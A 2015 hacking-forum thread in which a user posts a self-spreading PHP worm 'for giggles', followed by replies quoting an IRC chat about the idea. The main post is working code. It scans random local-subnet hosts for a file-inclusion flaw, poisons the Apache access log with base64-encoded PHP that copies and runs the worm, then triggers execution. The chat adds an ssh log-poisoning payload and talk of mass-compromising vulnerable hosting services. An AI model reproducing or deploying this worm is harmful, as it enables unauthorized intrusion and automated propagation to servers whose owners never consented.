php log worm POC for giggles

A place to submit all custom code, scripts, and programs.
Forum rules
Do NOT post malicious code or programs. Please review all code posted in this forum before downloading or running any of the code or programs here.

php log worm POC for giggles

Post by MadM0use on Wed Jun 03, 2015 10:34 pm
([msg=88322]see php log worm POC for giggles[/msg])

I am too lazy to do a write up for this post, and i don't feel bad because the idea is simple as fuck :P
if you have any questions, please feel free to ask them here, and I will be glad to answer them.
if you have any criticisms, I dont care, this is a toy :P

Code: Select all
<?php
// ----------------------------------------------------------------------------
// "THE BEER-WARE LICENSE" (Revision 43):
// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
// can do whatever you want with this stuff. If we meet some day, and you think
// this stuff is worth it, you can buy me a beer in return Aaron R. Yool
// ----------------------------------------------------------------------------
// DISCLAIMER:
// I MadMouse (Aaron R. Yool), am not responsible for the misuse of, (or any use thereof)
// of this software. Use this software at your own risk, and do not blame me for your
// stupidity, as I am not responsible for the actions taken by others. I have my own
// stupidity to be responsible for. lol
   
function scan_for_life()
{
   while(true)
   {
      $host = "192.168.1.".rand(1,255);
      $socket = stream_socket_client("tcp://$host:80", $errno, $errorMessage);
      if ($socket === false) continue;
      else
      {
         fwrite($socket, "GET /index.php?page=/var/log/apache2/access.log HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n");
         $response = stream_get_contents($socket);
         if(strpos($response,"HTTP/1.1 404 Not Found") !== false)
         {
            fclose($socket);
            continue;
         }
         elseif(strpos($response,"Not Found") !== false)
         {
            fclose($socket);
            continue;
         }
      }
      fclose($socket);
      break;
   }
   echo "Host: ".$host." under fire.\n";
   return $host;
}

function send_payload($host)
{
   $socket = stream_socket_client("tcp://$host:80", $errno, $errorMessage);
   if ($socket === false) return false;
   fwrite($socket, "GET /<?php file_put_contents('logwrm.php',base64_decode('".base64_encode(php_strip_whitespace("logwrm.php"))."'));exec(base64_decode('".base64_encode("php logwrm.php > /dev/null &")."')); ?> HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n");
   fclose($socket);
   return true;
}

function run_payload($host)
{
   file_get_contents("http://".$host."/index.php?page=/var/log/apache2/access.log");
}

while(true)
{
   echo "\nScanning for a victim\n";
   $victim = scan_for_life();
   sleep(1);
   echo "Sending payload\n";
   if(!send_payload($victim)) continue;
   sleep(1);
   run_payload($victim);
   echo "PWNED!!!\n";
}

?>
const char main[]="\xeb\xfe -> A fully functional program in C";

<@MadMouse> i am forgot what i was doing today but i had motivation and a distinct plan when i woke up stoned right now

http://pastebin.com/FnwUG5KS
Books:
http://goo.gl/muPm3d
User avatar
MadM0use
Experienced User
Experienced User
 
Posts: 70
Joined: Thu Sep 11, 2014 10:30 pm
Blog: View Blog (0)


Re: php log worm POC for giggles

Post by Turn on Thu Jun 04, 2015 5:35 am
([msg=88324]see Re: php log worm POC for giggles[/msg])

Thanks for crediting me on this.....
Social Engineering:
<cen> .lua print ('Tsyn 9.47.-u 3 12 5')
* slickery has quit (User has been banned from HackThisSite (Attempting to use a SpyBot))
* cen has quit (User has been banned from HackThisSite (Attempting to use a SpyBot))
User avatar
Turn
Poster
Poster
 
Posts: 120
Joined: Tue Feb 17, 2015 5:42 am
Blog: View Blog (0)


Re: php log worm POC for giggles

Post by MadM0use on Thu Jun 04, 2015 2:47 pm
([msg=88331]see Re: php log worm POC for giggles[/msg])

Turn wrote:Thanks for crediting me on this.....

OH SHIT, my bad lol,


8:52 PM <madmouse> are you talking log flooding?
8:52 PM <project1010> Putting the admin password in plain text than uploading it to the web?
8:52 PM <Turn> In the event that the logs are being thrown up and code execution from PHP is possible
8:52 PM <Turn> Generate log errors with PHP code
8:52 PM <madmouse> hmmm, neverthought to do that
8:52 PM <Turn> Like: ssh '<?php echo("pwned"); ?>'@site.com
8:53 PM <Turn> would be in the ssh log
8:53 PM <Turn> if it's on the site, that code will execute
8:53 PM <madmouse> true that
8:53 PM <madmouse> and i have seen hosting services with logs in decompressed form in the root of the web directory
8:53 PM <madmouse> wow, to pwn or not to pwn all night ios the question now lol
8:53 PM <Turn> all night?
8:54 PM <Turn> Should be like a few seconds
8:54 PM <madmouse> im talking masses of them
8:54 PM <madmouse> lol
8:54 PM <Turn> Oh
8:54 PM <Turn> :D
8:54 PM <madmouse> i know of several web hosting services tyhat are definitely vulnerable to this lol
8:54 PM <madmouse> and that is just about the easiest thing to script into a php worm i have heard of
8:54 PM <madmouse> time for a POC



I had it saved and was so feverish with this illness i forgot xD I love you bro lol
const char main[]="\xeb\xfe -> A fully functional program in C";

<@MadMouse> i am forgot what i was doing today but i had motivation and a distinct plan when i woke up stoned right now

http://pastebin.com/FnwUG5KS
Books:
http://goo.gl/muPm3d
User avatar
MadM0use
Experienced User
Experienced User
 
Posts: 70
Joined: Thu Sep 11, 2014 10:30 pm
Blog: View Blog (0)



Return to Custom Code

Who is online

Users browsing this forum: No registered users and 0 guests